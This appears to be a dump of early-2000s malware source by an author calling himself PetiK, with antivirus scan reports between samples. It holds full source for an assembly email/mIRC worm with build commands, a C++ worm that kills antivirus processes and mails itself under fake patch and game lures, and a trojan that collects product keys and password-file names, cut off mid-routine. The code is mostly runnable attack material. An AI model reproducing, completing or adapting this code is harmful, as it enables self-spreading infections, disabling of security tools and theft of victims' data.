File WTC.exe received on 05.16.2009 20:03:13 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.Win32.Petik!IK Win32/PetTick.8704.C Worm/Petik.Gen Worm/Win32.Win32 W32/Malware!2e38 Win32:Petik-WTC I-Worm/Petik.M Generic.Malware.SMsp!g.852A5C9B Worm.WTC Worm.Win32.Petik.U Win32.Petik.12288 Win32.Petik Win32/Petik.8704.C W32/Malware!2e38 Email-Worm.Win32.Petik W32/PetTick@mm Generic.Malware.SMsp!g.852A5C9B Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM Artemis!2FB45484ACDD Worm.Petik.Gen Worm:Win32/PetTick.L@mm Win32/Petik.U W32/Pet_Tick.8704.D W32/Petik I-Worm.Petik.J1 Medium Risk Malware Worm.Petik.GEN W32/Petik-WTC Worm.Petik W95.Pet_Tick.gen W32/Petik WORM_PET.TICK.Q Win32.Worm.WTC I-Worm.Win32.PetTick.8704.C I-Worm.Petik.J1

Additional information File size: 8704 bytes MD5...: 2fb45484acdd0ec3a4f7f199b13e2262 SHA1..: 657559e72ba0fb47cbe296be5f8c8d01c1164636 PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

comment # Name : I-Worm.Anthrax (aka : I-Worm.Fi) Author : PetiK Date : October 11th - November 6th Size : 6144 byte (compiled with UPX tool) Action: Copy itself to * WINDOWS\SYSTEM\MsSys32.exe Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value * Microsoft System = WINDOWS\SYSTEM\MsSys32.exe The virus uses anti-* against SoftICE It creates a file to go to a web site about the anthrax. On the Desktop if it can or else on c:\ root. It creates in some directory a script to be able to spread with mIRC : -C:\mirc -C:\mirc32 -C:\progra~1\mirc -C:\progra~1\mirc32 To spread, it uses MAPI mechanism with 10 first email found in the WAB. To delete the worm : Look at the file Delete_Fi.vbs To built the worm : @echo off tasm32 /ml /m9 Anthrax tlink32 -Tpe -c -x -aa Anthrax,,,import32,dllz upx -9 Anthrax.exe if exist *.obj del *.obj if exist *.map del *.map Notes of the authors: The worm bugs at the end of it spread WAB. I want to thanks very much Benny. I learnt a lot of things while seeing his differents code (XTC, HiV and Universe). # .586p .model flat .code JUMPS api macro a extrn a:proc call a endm include useful.inc include myinclude.inc start: twin_worm: push mov push push api mov push push push api add mov stosd mov stosd 50 esi,offset orig_worm esi 0 GetModuleFileNameA edi,offset copy_worm edi 50 edi GetSystemDirectoryA edi,eax eax,"SsM\" eax,"23sy"

; esi = name of file

mov eax,"exe." stosd pop edi push push push api test je 1 edi esi CopyFileA eax,eax end_twin

; edi = %system%\MsSys32.exe

; copy itself ; already copy ??

push 20 push edi push 1 @pushsz "Microsoft System" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h api SHSetValueA ; regedit mess: push 1040h @pushsz "Microsoft Windows" call @txt db "You must be connected to run this file.",CRLF,CRLF db "If it's not the case, please connect you.",0 @txt: push 0 api MessageBoxA ; fake message end_twin: call e_sr: call call call verif_inet: push push api dec jnz hide_worm create_url spread_mirc 0 offset inet InternetGetConnectedState eax verif_inet debug

spread_wab: pushad srch_wab: mov edi,offset wab_path push offset wab_size push edi push offset reg push 0 @pushsz "Software\Microsoft\Wab\WAB4\Wab File Name" push 80000001h api SHGetValueA push push push push push push push api inc je dec xchg push push push push push push api test je 0 0 3 0 1 80000000h offset wab_path CreateFileA eax end_srch_wab eax ebx,eax 0 0 0 2 0 ebx CreateFileMappingA eax,eax end_wab1

; The name of WAB file

xchg push push push push push api test je xchg

eax,ebp 0 0 0 4 ebp MapViewOfFile eax,eax end_wab2 eax,esi

mov verif,0 d_scan_mail: call @smtp db 'SMTP',00h,1Eh,10h,56h,3Ah @smtp: pop edi s_scan_mail: pushad push 9 pop ecx rep cmpsb popad je scan_mail inc esi loop s_scan_mail end_wab3: push esi api UnmapViewOfFile end_wab2: push ebp api CloseHandle end_wab1: push ebx api CloseHandle end_srch_wab: popad end_worm: push api 0 ExitProcess

; the string what we want to find

create_url: ; This routine has perhaps bug on WinNT/2k pushad desktop_url: @pushsz "SHELL32.dll" api LoadLibraryA mov ebx,eax @pushsz "SHGetSpecialFolderPathA" push ebx api GetProcAddress test eax,eax jz on_hd mov ebp,eax push 0 push 0 ; DESKTOP push offset desktop push 0 call ebp @pushsz "\Anthrax_Info.url" push offset desktop api lstrcat mov esi,offset desktop jmp c_sys on_hd: @getsz "C:\Anthrax_Info.url",esi c_sys: push 50 push offset shelldir api GetSystemDirectoryA @pushsz "\Shell32.dll" push offset shelldir api lstrcat cr_url: push esi @pushsz "http://www.anthrax.com"

@pushsz "URL" @pushsz "InternetShortcut" api WritePrivateProfileStringA push esi @pushsz "23" @pushsz "IconIndex" @pushsz "InternetShortcut" api WritePrivateProfileStringA push esi push offset shelldir @pushsz "IconFile" @pushsz "InternetShortcut" api WritePrivateProfileStringA end_url: push ebx api FreeLibrary popad ret debug Proc pushad mov eax,fs:[20h] test eax,eax je $+4 kill: int 19h api IsDebuggerPresent test eax,eax jne kill push 0 push 80h push 3 push 0 push 0 push 40000000h or 80000000h @pushsz "\\.\SICE" api CreateFileA inc eax jne kill push 0 push 80h push 3 push 0 push 0 push 40000000h or 80000000h @pushsz "\\.\NTICE" api CreateFileA inc eax jne kill popad ret debug EndP hide_worm Proc pushad @pushsz "KERNEL32.dll" api GetModuleHandleA xchg eax,ecx jecxz end_hide_worm @pushsz "RegisterServiceProcess" push ecx api GetProcAddress xchg eax,ecx jecxz end_hide_worm push 1 push 0 call ecx end_hide_worm: popad ret hide_worm EndP spread_mirc Proc push 50 push offset mircspread

; CD19

; SOFTICE driver win98

; SOFTICE driver winNT/2k

; Registered as Service Process

api GetSystemDirectoryA @pushsz "\MsSys32.exe" push offset mircspread api lstrcat pushad call @mirc db 'C:\mirc\script.ini',0 db 'C:\mirc32\script.ini',0 db 'C:\progra~1\mirc\script.ini',0 db 'C:\progra~1\mirc32\script.ini',0 @mirc: pop esi push 4 pop ecx mirc_loop: push ecx push 0 push 80h push 2 push 0 push 1 push 40000000h push esi api CreateFileA mov [hmirc],eax push 0 push offset byte_write @tmp_mirc: push e_mirc - s_mirc push offset s_mirc push [hmirc] api WriteFile push [hmirc] api CloseHandle @endsz pop ecx loop mirc_loop end_spread_mirc: popad ret spread_mirc EndP scan_mail: xor edx,edx add esi,21 mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,00h je f_mail cmp al,"@" jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c f_mail: xor al,al stosb pop edi test edx,edx je d_scan_mail call send_mail cmp verif,10 je end_worm jmp d_scan_mail send_mail: inc verif pushad @pushsz "MAPI32.DLL" api LoadLibraryA xchg ebx,eax mapi macro x

; spread with mIRC. Thanx to Microsoft.

push push api mov endm mapi mapi mapi

offset sz&x ebx GetProcAddress x,eax MAPILogon MAPISendMail MAPILogoff

mapi_logon: xor eax,eax push offset hMAPI push eax push eax push eax push eax push eax call MAPILogon test eax,eax jne end_send_mail mapi_send_mail: xor eax,eax push eax push eax push offset MsgWrm push eax push [hMAPI] call MAPISendMail mapi_logoff: xor eax,eax push eax push eax push eax push [hMAPI] call MAPILogoff push ebx api FreeLibrary end_send_mail: popad ret .data ; === copy_worm === orig_worm db 50 dup (0) copy_worm db 50 dup (0) ; === url_info === desktop db 50 dup (0) shelldir db 50 dup (0) hurl dd ? ; === spread_mirc === byte_write dd ? hmirc dd ? s_mirc: db '[script]',CRLF db 'n0=on 1:JOIN:{',CRLF db 'n1= /if ( $nick == $me ) { halt }',CRLF db 'n2= /.dcc send $nick ' mircspread db 50 dup (0) db CRLF,'n3=}',0 e_mirc: ; === spread_wab === inet dd 0 wab_path db 100 dup (0) wab_size dd 100 reg dd 1 verif dd ? ; === scan_mail === mail_addr db 128 dup (?)

; === spread_mail szMAPISendMail szMAPILogon szMAPILogoff MAPISendMail MAPILogon MAPILogoff hMAPI

=== db "MAPISendMail",0 db "MAPILogon",0 db "MAPILogoff",0 dd dd dd dd ? ? ? 0

; === gen_mail === subjectwrm db "What is the anthrax ?",0 bodywrm db "I send you some informations about Anthrax.",CRLF db "Click on the attached file.",0 name_mail db "Anthrax_Info.exe",0 mail_from db "support@microsoft.com",0 MsgWrm dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd ? dd dd dd dd dd AttachWrm dd ? dd dd dd dd dd signature author end start end ? ? offset orig_worm offset name_mail ? 1 ? offset mail_addr ? ? ? offset offset ? ? ? 2 offset 1 offset 1 offset subjectwrm bodywrm

MsgFrom MsgToWrm AttachWrm

MsgFrom

? 1 offset MsgFrom offset mail_from ? ?

MsgToWrm

db "I-Worm.Anthrax " db "Coded by PetiK - 2001",00h

File Anthrax.exe received on 05.16.2009 10:44:20 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.51.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result Email-Worm.Win32.Petik!IK Win32/PetTick.worm.6144 Worm/Petik.1 Worm/Win32.Win32 W32/Malware!156f Win32:AntraxInfo I-Worm/Petik Generic.Malware.SIg.638D8F0A Worm.Petik.1 Worm.Win32.Petik.T Win32.Petik.8192 Suspicious File Win32/Petik.6144.B W32/Malware!156f Email-Worm.Win32.Petik W32/PetTick@mm Generic.Malware.SIg.638D8F0A Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM Artemis!0C6CD035D3C5 Worm.Petik.1 Worm:Win32/PetTick@mm Win32/Petik.T W32/Pet_Tick.6144.B Worm/W32.Petik.6144.B W32/Petik I-Worm.Petik.L High Risk Cloaked Malware Worm.Anthrax W32/Petick-A Worm.Petik W95.Pet_Tick.gen WORM_PET.TICK.S Win32.Worm.Anthrax I-Worm.Win32.PetTick.6144 I-Worm.Petik.L

Additional information File size: 6144 bytes MD5...: 0c6cd035d3c5b84b13d1f54d70bf5fb3 SHA1..: 80bd3e0ec9c6ab27997d7e55d4b0094ebeea26c9 SHA256: 36ee4e185c6b791ae8d38118bd0e00ae3c2135c1bfcd7f3452165a18c96283dc PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

/* Name of worm : W32.HLLW.Last Author : PetiK Size : 28672 byte Date : 10/12/2001 Comment : My very first (and last) worm coded in C++ (compiled with Borland). Why this name ? I decided to stop to code worms and virus. During one year I learnt many things about worms and virii and I thanks all poeple who helped me. */ #include <stdio.h> #include <windows.h> #include <mapi.h> #include <tlhelp32.h> #pragma argsused//ne pas générer de fichier listing de compilation char filename[100]; char windir[100], windr[100]; HKEY hReg; FILE *htm; HANDLE infhtm,lSnapshot,myproc; HWND NAVh; BOOL rProcessFound; LPSTR Run = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; LHANDLE session; MapiMessage *mess; HINSTANCE hMAPI; char messId[512],mname[50],maddr[30]; unsigned long count=0; BYTE done[50]; DWORD siz=sizeof(done); DWORD type=REG_SZ; LPSTR Persona=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders"; SYSTEMTIME syst; PROCESSENTRY32 uProcess; WIN32_FIND_DATA ffile; char *sujet[]={ "New Game for You.", "Protect your computer against VBS/Worm and VBS/Virus", "Free Flash Application !", "Internet Explorer 5.0/6.0 Patch", "Try WinXP.", "Free Chat", }; char *corps[]={ "Hi,\n\nTake a look at this new game found on the web.", "This tool allows you to protect your computer against the VBS worm/virus.", "Hi,\n\nVery good application make with Flash 5.", "There is the last patch for Internet Explorer against the ActiveX's bugs.", "Run this small program to see a demo of Win XP.", "Hello,\n\nVery cool program to chat on the net.", }; char *attachfile[]={ "New_Game.exe", "Fix_VBSWormVirus.exe", "Flash_EXE.exe", "IEPatch.exe", "Demo_WinXP.exe", "FreeChat.exe", }; char *text[]={ "This file is not a Win32 file valid", "Cannot Open files : It does not appear to be a valid Win32\n\nIf you downloaded the file, try downloading again.",

"Error with Kernel32 :\nThis program will be terminated.", "Loader Error :\nThis program will be terminated." }; void void void void ULONG ULONG ULONG ULONG ULONG ULONG ULONG Welcome(); FuckAntivirus(); htmfile(); Spread(); (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL FAR FAR FAR FAR FAR FAR FAR *RegSerPro)(ULONG, ULONG); *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG); *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG); *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE); *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR); *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *); *mFreeBuffer)(LPVOID);

WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) { HMODULE k32=GetModuleHandle("KERNEL32.DLL"); if(k32) { (FARPROC &)RegSerPro=GetProcAddress(k32,"RegisterServiceProcess"); if(RegSerPro) RegSerPro(NULL,1); } GetModuleFileName(hInst,filename,100); GetWindowsDirectory((char *)windir,100); strcpy(windr,windir); strcat(windir,"\\MSKERN32.EXE"); if ((lstrcmp(filename,windir))!=0) { Welcome(); } strcat(windr,"\\MSKern32.exe"); CopyFile(filename,windr,0); RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg); RegSetValueEx(hReg,"MS Kernel32",0,REG_SZ, (BYTE *)windr, 100); RegCloseKey(hReg); FuckAntivirus(); GetSystemTime(&syst); if(syst.wDay==1 && syst.wMonth==12) { CreateDirectory("C:\\PetiK_Dir",0); SetCurrentDirectory("C:\\PetiK_Dir"); htm = fopen("petikvx.htm","w"); fprintf(htm,"<html><head><title>The Last From PetiK</title></head>\n"); fprintf(htm,"<body bgcolor=\"blue\" text=\"yellow\">\n"); fprintf(htm,"<p align=\"center\"><font size=\"5\">Win32.HLLW.Last is in your computer\n"); fprintf(htm,"<p align=\"center\"><font size=\"5\">This my last worm\n"); fprintf(htm,"<p align=\"center\"><font size=\"3\">Greetz to : all3gro, Benny, Bumblebee, "); fprintf(htm,"Mandragore, ZeMacroKiller98, the 29A group and the [MATRiX] group.\n"); fprintf(htm,"<p align=\"center\"><font size=\"5\">GOOD BYE\n"); fprintf(htm,"</font></p>\n"); fprintf(htm,"</body></html>"); fclose(htm); ShellExecute(0,"open","petikvx.htm",0,0,SW_SHOWNORMAL); Sleep(3000); MessageBox(NULL,"My last worm.\nCoded by PetiK (c)2001","W32.HLLW.Last", MB_OK| MB_ICONINFORMATION); } htmfile(); Sleep(30000); Spread(); return 0; } void Welcome()

{ MessageBeep(MB_ICONHAND); MessageBox(NULL, text[GetTickCount()&3], filename, MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); } void FuckAntivirus() { register BOOL term; lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); uProcess.dwSize=sizeof(uProcess); rProcessFound=Process32First(lSnapshot,&uProcess); while(rProcessFound) { if(strstr(uProcess.szExeFile,"NAVAPW32.EXE")!=NULL) { // Norton Antivirus myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID); if(myproc!=NULL) { term=TerminateProcess(myproc,0); } CloseHandle(myproc); } if(strstr(uProcess.szExeFile,"PAVSCHED.EXE")!=NULL) { // Panda Antivirus myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID); if(myproc!=NULL) { term=TerminateProcess(myproc,0); } CloseHandle(myproc); } rProcessFound=Process32Next(lSnapshot,&uProcess); } CloseHandle(lSnapshot); } void htmfile() { register bool abc=TRUE; register HANDLE hFile; register HWND verif; RegOpenKeyEx(HKEY_USERS,Persona,0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,"Personal",0,&type,done,&siz); RegCloseKey(hReg); SetCurrentDirectory(done); hFile=FindFirstFile("*.ht*",&ffile); if(hFile!=INVALID_HANDLE_VALUE) { while(abc) { WritePrivateProfileString("HTM,HTML Files",ffile.cFileName,"Found by W32.HLLW.Last","C:\\liste.txt"); abc=FindNextFile(hFile,&ffile); } } FindClose(hFile); abc=TRUE; hFile=FindFirstFile("*.doc",&ffile); if(hFile!=INVALID_HANDLE_VALUE) { while(abc) { WritePrivateProfileString("DOC Files",ffile.cFileName,"Found by W32.HLLW.Last","C:\\liste.txt"); abc=FindNextFile(hFile,&ffile); } } SetFileAttributes("C:\\liste.txt",FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN); } void Spread() { hMAPI=LoadLibrary("MAPI32.DLL"); (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon"); (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff"); (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext"); (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail"); (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail"); (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer"); mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session); if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) { do { if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY| MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) { count=(unsigned long)(syst.wMilliseconds*syst.wMinute); while(count>5)

count=(unsigned long)(count/2); strcpy(mname,mess->lpOriginator->lpszName); strcpy(maddr,mess->lpOriginator->lpszAddress); mess->ulReserved=0; mess->lpszSubject=sujet[count]; mess->lpszNoteText=corps[count]; mess->lpszMessageType=NULL; mess->lpszDateReceived=NULL; mess->lpszConversationID=NULL; mess->flFlags=MAPI_SENT; mess->lpOriginator->ulReserved=0; mess->lpOriginator->ulRecipClass=MAPI_ORIG; mess->lpOriginator->lpszName=mess->lpRecips->lpszName; mess->lpOriginator->lpszAddress=mess->lpRecips->lpszAddress; mess->nRecipCount=1; mess->lpRecips->ulReserved=0; mess->lpRecips->ulRecipClass=MAPI_TO; mess->lpRecips->lpszName=mname; mess->lpRecips->lpszAddress=maddr; mess->nFileCount=1; mess->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); memset(mess->lpFiles, 0, sizeof(MapiFileDesc)); mess->lpFiles->ulReserved=0; mess->lpFiles->flFlags=NULL; mess->lpFiles->nPosition=-1; mess->lpFiles->lpszPathName=filename; mess->lpFiles->lpszFileName=attachfile[count]; mess->lpFiles->lpFileType=NULL; mSendMail(session, NULL, mess, NULL, NULL); count++; } }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS); free(mess->lpFiles); mFreeBuffer(mess); mLogoff(session,0,0,0); FreeLibrary(hMAPI); } }

File Last.exe received on 05.16.2009 17:43:12 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.Win32.Stopin!IK Win32/Stopin.worm.28672 Worm/Stopin.B Worm/Win32.Stopin Win32:Matrix-GoodY I-Worm/Petik.T I-Worm.Stopin.B I-Worm.Stopin.b Worm.Stopin.B Worm.Win32.Stopin.A Win32.HLLM.Petik.59932 Win32.Stopin.b Win32/Petik.28672.A Email-Worm.Win32.Stopin.b W32/Stopin.B@mm I-Worm.Stopin.B Email-Worm.Win32.Stopin Email-Worm.Win32.Stopin.b Email-Worm.Win32.Stopin.b W32/Stopin.a@MM W32/Stopin.a@MM Worm.Stopin.B Worm:Win32/Petick.AI@mm Win32/Stopin.A W32/Stopin.B@mm Worm/W32.Stopin.28672 W32/HLLW.Last I-Worm.Petlast.A High Risk Worm Worm.Mail.Stopin.a W32/Stall-A Email-Worm.Win32.Stopin.b W95.Pet_Tick.gen W32/Stopin.b WORM_PETTICK.Z Win32.HLLW.Last I-Worm.Win32.Stopin.B I-Worm.Petlast.A

Additional information File size: 28672 bytes MD5...: bfce6a179fa853c4c0a5bffc6b8c8f72 SHA1..: 6c8f1623c5471d556003928c15bf670175fc4d3d PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

/* Name : Trojan.PetiK Author : PetiK Language : C++/ASM Début : 12 décembre 2001 Fin : 29 décembre 2001 Modifications : 13 janvier 2002 */

#include <windows.h> #include <tlhelp32.h> #include <mapi.h> #pragma argused #pragma inline // Install Trojan char filename[100], sysdir[100], sysdr[100], liste[50], pwl[50]; HKEY hReg; LPSTR Run = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; // Fuck antivirus HANDLE lSnapshot,myproc; BOOL rProcessFound; // Prend des informations BYTE owner[100],org[100],key[30],id[30],ver[30]; BYTE page[150]; DWORD sizowner=sizeof(owner),sizorg=sizeof(org),sizkey=sizeof(key),sizid=sizeof(id); DWORD sizver=sizeof(ver),sizpage=sizeof(page),type=REG_SZ; LPSTR CurVer="Software\\Microsoft\\Windows\\CurrentVersion",Main="Software\\Microsoft\\Internet Explorer\\Main"; // Envoie les infos PROCESSENTRY32 uProcess; WIN32_FIND_DATA Search; void void void void Bienvenue(); StopDetect(); Information(); SendInfo();

ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG); int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) { HMODULE k32=GetModuleHandle("KERNEL32.DLL"); if(k32) { (FARPROC &)RegSerPro=GetProcAddress(k32,"RegisterServiceProcess"); if(RegSerPro) RegSerPro(NULL,1); } // Install trojan GetModuleFileName(hInst,filename,100); GetSystemDirectory((char *)sysdir,100); strcpy(sysdr,sysdir); strcat(sysdir,"\\SETUP02.EXE"); if ((lstrcmp(filename,sysdir))!=0) { Bienvenue(); } else { SendInfo(); } strcat(sysdr,"\\Setup02.exe"); CopyFile(filename,sysdr,0); RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg); RegSetValueEx(hReg,"Microsoft Setup",0,REG_SZ, (BYTE *)sysdr, 100); RegCloseKey(hReg); StopDetect();

Information(); } void StopDetect() { register BOOL term; lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); uProcess.dwSize=sizeof(uProcess); rProcessFound=Process32First(lSnapshot,&uProcess); while(rProcessFound) { if(strstr(uProcess.szExeFile,"NAVAPW32.EXE")!=NULL) { // Norton Antivirus myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID); if(myproc!=NULL) { term=TerminateProcess(myproc,0); } CloseHandle(myproc); } if(strstr(uProcess.szExeFile,"PAVSCHED.EXE")!=NULL) { // Panda Antivirus myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID); if(myproc!=NULL) { term=TerminateProcess(myproc,0); } CloseHandle(myproc); } rProcessFound=Process32Next(lSnapshot,&uProcess); } CloseHandle(lSnapshot); } void Information() { register bool abc=TRUE; register HANDLE hFile; GetSystemDirectory((char *)liste,50); strcat(liste,"\\liste_troj.txt"); RegOpenKeyEx(HKEY_LOCAL_MACHINE,CurVer,0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,"RegisteredOwner",0,&type,owner,&sizowner); RegQueryValueEx(hReg,"RegisteredOrganization",0,&type,org,&sizorg); RegQueryValueEx(hReg,"ProductKey",0,&type,key,&sizkey); RegQueryValueEx(hReg,"ProductId",0,&type,id,&sizid); RegQueryValueEx(hReg,"Version",0,&type,ver,&sizver); RegCloseKey(hReg); RegOpenKeyEx(HKEY_CURRENT_USER,Main,0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,"Start Page",0,&type,page,&sizpage); RegCloseKey(hReg); WritePrivateProfileString("Info Ordi","Owner",owner,liste); WritePrivateProfileString("Info Ordi","Organization",org,liste); WritePrivateProfileString("Info Ordi","ProductKey",key,liste); WritePrivateProfileString("Info Ordi","ProductId",id,liste); WritePrivateProfileString("Info Ordi","Version",ver,liste); WritePrivateProfileString("Info Internet","Page Internet",page,liste); GetWindowsDirectory((char *)pwl,50); SetCurrentDirectory(pwl); hFile=FindFirstFile("*.pwl",&Search); if(hFile!=INVALID_HANDLE_VALUE) { while(abc) { WritePrivateProfileString("Info Pass",Search.cFileName,pwl,liste); abc=FindNextFile(hFile,&Search); } } FindClose(hFile); } void SendInfo() { _asm { DebutAsm: push 50 push offset liste call GetSystemDirectoryA call @liste db "\liste_troj.txt",0 @liste: push offset liste call lstrcat

